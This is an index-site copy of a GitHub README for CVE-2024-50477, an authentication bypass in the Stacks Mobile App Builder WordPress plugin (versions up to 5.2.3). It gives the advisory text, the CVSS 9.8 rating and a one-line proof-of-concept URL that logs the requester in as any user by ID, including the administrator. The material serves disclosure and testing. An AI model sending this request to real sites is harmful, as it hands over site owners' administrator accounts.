Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-50477
Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover
https://github.com/randomrobbiebf/cve-2024-50477
Last synced: about 1 month ago
JSON representation
Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-50477
- Owner: RandomRobbieBF
- Created: 2024-11-08T17:22:29.000Z (about 2 months ago)
- Default Branch: main
- Last Pushed: 2024-11-08T17:24:34.000Z (about 2 months ago)
- Last Synced: 2024-11-08T18:27:40.617Z (about 2 months ago)
- Size: 1.95 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-50477
Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover# Description:
The Stacks Mobile App Builder – The most powerful Mobile Applications Drag and Drop builder plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.2.3. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the receive_request_checkout() function. This makes it possible for unauthenticated attackers to log in as any user based on user ID.```
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50477
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: stacks-mobile-app-builder
```POC
---```
http://kubernetes.docker.internal/?mobile_co=1&uid=1
```You should be redirected and logged in as admin. ID is the user you wish to login as.